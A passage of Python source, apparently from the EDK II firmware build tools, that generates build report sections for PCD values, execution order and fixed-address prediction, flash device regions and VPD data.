self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
if VPDPcdItem not in VPDPcdList:
PcdGuidList = self.UnusedPcds.get(Pcd.TokenSpaceGuidCName)
if PcdGuidList:
PcdList = PcdGuidList.get(Pcd.Type)
if not PcdList:
VPDPcdList.append(VPDPcdItem)
for VpdPcd in PcdList:
if PcdTokenCName == VpdPcd.TokenCName:
break
else:
VPDPcdList.append(VPDPcdItem)
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues.get(Sku)
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for _, Values in OverrideStruct.items():
for Key,value in Values.items():
if value[1] and value[1].endswith('.dsc'):
OverrideFieldStruct[Key] = value
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
RealEntryPoint = "_ModuleEntryPoint"
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
# Invokes EOT tool to get the predicted the execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = []
for Item in self._SourceList:
FileWrite(TempFile, Item)
SaveFileOnChange(SourceList, "".join(TempFile), False)
TempFile = []
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
SaveFileOnChange(GuidList, "".join(TempFile), False)
try:
from Eot.EotMain import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
FileWrite(File, gSectionStart)
##
# Generate Fixed Address report.
#
# This function generate the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
# This function generate the predicted fixed address report for a module or
# predicted module execution order for a platform.
# If the input Guid is None, then, it generates the predicted module execution order;
# otherwise it generated the module fixed loading address for the module specified by
# Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
# This is an internal worker function to discover the all the nested FV information
# in the parent firmware volume. It uses deep first search algorithm recursively to
# find all the FV list name and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
# This internal worker function to generate report for the FD region.
# It the type is firmware volume, it lists offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VPDBaseAddress = 0
self.VPDSize = 0
for index, FdRegion in enumerate(Fd.RegionList):
if str(FdRegion.RegionType) == 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if VPDPcdList:
VPDPcdList.sort(key=lambda x: int(x[2], 0))
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in VPDPcdList:
# Add BaseAddress for offset
Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
IsByteArray, ArrayList = ByteArrayForamt(item[-1])
Skuinfo = item[1]
if len(GlobalData.gSkuids) == 1 :
Skuinfo = GlobalData.gSkuids[0]
if IsByteArray:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
# This constructor function generates PlatformReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile, Pa.DataPipe)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
